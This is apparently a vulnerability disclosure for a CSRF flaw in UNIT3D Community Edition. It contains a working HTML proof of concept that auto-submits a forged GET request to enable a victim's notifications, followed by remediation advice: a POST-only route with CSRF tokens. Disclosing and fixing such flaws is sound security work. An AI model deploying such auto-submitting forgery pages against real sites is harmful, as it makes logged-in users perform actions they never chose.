Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Aug 4th 2021
An attacker can enable notifications on a victim's account if the victim, while logged in, visits a page the attacker controls.
Proof of Concept
- While logged in to the target site, open POC.html in a browser.
- Check your settings: notifications are now enabled.
```html
<html>
  <body>
    <!-- Replace the PoC's path in the address bar before the form submits -->
    <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so this submits as a top-level GET navigation;
         the victim's SameSite=Lax session cookie is attached to it -->
    <form action="https://unit3d.site/users/UNIT3D/settings/notification/enable">
      <input type="submit" value="Submit request" />
    </form>
    <!-- Auto-submit the first (and only) form on the page -->
    <script>document.forms[0].submit();</script>
  </body>
</html>
```
The vulnerability lets an attacker force a logged-in user to enable notifications without intending to.
Tested on Edge, Firefox, Chrome and Safari.
Enabling notifications changes state, so it should not be reachable by GET at all. Make the route POST-only and verify a per-session CSRF token on it. Moving to POST also gets help from the browser: with the session cookie at SameSite=Lax, a cross-site POST is sent without the cookie, whereas the top-level GET navigation in the PoC above still carries it, which is exactly why the PoC works. Treat Lax as defence in depth rather than a substitute for the token: it does not apply on older browsers, and a cookie set with SameSite=None would be sent on a cross-site POST too.
Status: a member of the hdinnovations/unit3d-community-edition team has been contacted; awaiting a response.